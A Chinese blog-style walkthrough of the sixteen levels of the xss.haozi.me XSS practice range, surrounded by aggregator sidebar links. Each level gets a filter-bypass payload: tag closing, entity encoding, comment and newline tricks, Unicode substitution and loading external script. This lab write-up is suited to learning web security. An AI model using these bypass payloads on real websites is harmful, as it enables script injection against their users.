当前位置:网站首页>XSS靶场中级绕过
XSS靶场中级绕过
2022-08-01 19:24:00 【当兵回来你可还在】
XSS靶场中级绕过解析
靶场环境—https://xss.haozi.me/
第一关:
div块是普通元素,直接写入< script >标签即可。
<script>alert(1)</script>或者<img src=1 onerror=alert(1)>或者<svg/onload=alert(1)>

第二关:
逃脱< textarea>标签,直接闭合。
</textarea><script>alert(1)</script></textarea>

第三关:
逃出双引号,闭合input。
a"><script>alert(1)</script>

第四关:
已经过滤了括号,所以利用mtml实体编码,编译成()。
<img src=1 onerror="alert(1)">

第五关:
过滤了括号,反引号,尖括号,还是利用html实体编码。
<img src=1 onerror="alert(1)">

第六关:
转化成笑脸,利用注释符,直接闭合。
--!><script>alert(1)</script><!--

第七关:
换行,然后进行过滤
type = "image" src=1 onerror
=alert(1)

第八关:
过滤了反斜杠,尖括号,标签不生效。img标签可以执行,但是不能补全标签,html会丢错。
<img src ="1" onerror="alert(1)"

第九关:
输出在< style>里面,只能出现文本,不能写js ,闭合< style>也不行。利用换行闭合。
</style
><script>alert(1)</script>

第十关:
以https://www.segmentfault.com开头,将script标签闭合。
https://www.segmentfault.com"></script><script>alert(1)//

第十一关:
还是以https://www.segmentfault.com"开头。利用重定向,新建一个txrt文件,写入alert(1)。
https://[email protected]/txrt.js
第十二关:
将所有字母转化为大写。利用实体编码,将所有字母转换为16进制。
<img src=1 onerror=" alert(1)">

第十三关:
转换成大写还过滤了script标签。
<img src=1 onerror=" alert(1)">

第十四关:
注释了所有的内容,还是利用了注释符。
alert(1)
-->

第十五关:
利用是“s”可以转化为“ſ”。
<ſcript src = "http://127.0.0.1/txrt.js"</script>或者
<ſvg/onload=alert(1)>

第十六关:
将内容转成实体编码,但是可以生效。html认识。
aa');alert(1)//

边栏推荐
- Tencent Cloud Hosting Security x Lightweight Application Server | Powerful Joint Hosting Security Pratt & Whitney Version Released
- MySQL开发技巧——存储过程
- Map by value
- 把 Oracle 数据库从 RAC 集群迁移到单机环境
- 选择合适的 DevOps 工具,从理解 DevOps 开始
- AcWing 797. 差分
- 面试必问的HashCode技术内幕
- 即时通讯开发移动端弱网络优化方法总结
- Screen: GFF, OGS, Oncell, Incell of full lamination process
- 【周赛复盘】LeetCode第304场单周赛
猜你喜欢

力扣刷题之求两数之和

升哲科技携全域数字化方案亮相2022全球数字经济大会

Ha ha!A print function, quite good at playing!

【综述专栏】IJCAI 2022 | 图结构学习最新综述:研究进展与未来展望

Win11校园网无法连接怎么办?Win11连接不到校园网的解决方法

通配符 SSL/TLS 证书

Library website construction source code sharing

网站建设流程

开源视界 | StreamNative 盛宇帆:和浪漫的人一起做最浪漫的事

Gradle系列——Gradle文件操作,Gradle依赖(基于Gradle文档7.5)day3-1
随机推荐
腾讯云主机安全 x 轻量应用服务器|强强联合主机安全普惠版重磅发布
Keras deep learning practice - traffic sign recognition
TestNG multiple xml for automated testing
JS数组过滤
Fuzzy query in Map pass-by-value and object pass-by-value
app直播源码,点击搜索栏自动弹出下拉框
Win11如何开启剪贴板自动复制?Win11开启剪贴板自动复制的方法
使用常见问题解答软件的好处有哪些?
GEE(8):使用MODIS填补由去云后的Landsat影像计算得到的NDVI数据
【webrtc】sigslot : 继承has_slot 及相关流程和逻辑
数据库系统原理与应用教程(070)—— MySQL 练习题:操作题 101-109(十四):查询条件练习
ssh & scp
How to record and analyze your alchemy process - use notes of the visual artifact Wandb [1]
The XML configuration
Flowable-based upp (unified process platform) running performance optimization
vtk体绘制代码报错的解决办法(代码在vtk7,8,9中都能运行),以及VTK数据集网站
COS User Practice Call for Papers
Website construction process
【服务器数据恢复】服务器Raid5阵列mdisk组中多块磁盘离线的数据恢复案例
重保特辑|筑牢第一道防线,云防火墙攻防演练最佳实践